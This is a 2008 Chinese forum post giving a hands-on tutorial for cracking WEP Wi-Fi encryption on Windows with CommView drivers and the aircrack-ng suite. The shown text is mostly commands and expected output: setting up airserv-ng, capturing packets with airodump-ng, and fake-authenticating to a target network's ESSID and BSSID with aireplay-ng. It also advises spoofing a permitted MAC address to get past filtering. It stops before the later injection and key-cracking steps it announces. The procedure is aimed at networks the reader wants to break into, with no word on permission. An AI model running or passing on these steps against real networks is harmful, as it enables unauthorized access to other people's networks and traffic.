查看: 3368|回复: 3

使用airrack和注射式攻击来破解

253 回帖	640 积分	81 小时在线时间

中尉

注册时间: 2008-4-22

金币: 344 个

威望: 1 个

荣誉: 0 个

发消息

尚未签到

发表于 2008-12-12 23:40 |显示全部楼层

使用airrack和注射式攻击来破解WEPA首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动. A1如果你的网卡被commview支持的话,那么点下面的地址下载驱动: http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip A2 如果不被commview支持的网卡则可以下载widpackets的驱动: http://www.wildpackets.com/support/downloads/drivers 注意:下面的教程是在你正确安装commview的驱动的前提下进行的! B 你需要下载这个.dll文件(只适用于commview 的网友): http://darkircop.org/commview.dll C 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip D 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘 E 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\ F 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack). 当你完成以上准备以后,就可以开始正式的破解了! 破解: 1:打开一个命令提示符 (开始 > 运行 > cmd.exe) 2:在命令提示符窗口下面输入: Cd c:\aircrack -按下回车 3 在命令相同的提示符窗口下面输入: airserv-ng -d commview.dll -按下回车你看到的回复应该跟下面一样: Opening card commview.dll Setting chan 1 Opening sock port 666 Serving commview.dll chan 1 on port 666 如果你没有看到上面的结果的话,而是看到下面的结果的话: 注意这里可能会有两种情况出现!!!!!: (1) "Opening card commview.dll Adapter not found get_guid() airserv-ng: wi_open(): No error" 这种情况那么你可以试试这个命令: airserv-ng -d "commview.dll|debug" 然后你可能会看到下面的结果 Opening card commview.dll|debug Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470 get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co mboCard Gold - Paketplaner-Miniport Adapter not found get_guid() airserv-ng: wi_open(): No error 那么你只要输入下面的命令就可以了 airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}" 或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了 (2) "Opening card commview.dll F1 init_lib() airserv-ng: wi_open(): No error" 这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话. 4 -注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!! -在窗口2输入命令如下: cd c:\aircrack\ 按回车 5 -在窗口2输入命令如下: airodump-ng 127.0.0.1:666 回车提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!: airodump-ng --channel 你的频道号 127.0.0.1:666 比如说我需要监视的频道是6,那么命令如下 airodump-ng --channel 6 127.0.0.1:666 好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度. 6 现在重新开一个新的命令提示符窗口(窗口3),不要关掉前面的(窗口1)和(窗口2)!!! -在窗口3输入命令如下: cd c:\aircrack\ 按回车 7 在窗口3输入后面的命令: aireplay-ng -1 0 -e 你想破解网络的ESSID -a 你想破解网络的BSSID -h 你用来监视的网络的网卡MAC 127.0.0.1:666 实例: ESSID = wifi16 BSSID = 11:22:33:44:55:66 MAC = 01:23:45:67:89:01 提示: 你想破解网络的ESSID = 破解网络的名字 (wifi16, mynetwork) 你想破解网络的BSSID = 破解网络的MAC (11:22:33:44:55:66) 你用来监视的网络的网卡MAC = 这个就是你的网卡MAC咯那么命令行应该是: aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666 如果一切正常的话那么你会得到下面的回复: Sending Authentication Request Authentication successful Sending Association Request Association successful 如果你得到: AP rejects the source MAC address 这说明你破解的网络只允许特定的MAC 访问,那你你需要把你的MAC地址改成破解网络允许的地址. 如果你持续得到: sending authentication request 那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.

airrack, 攻击, 破解, 注射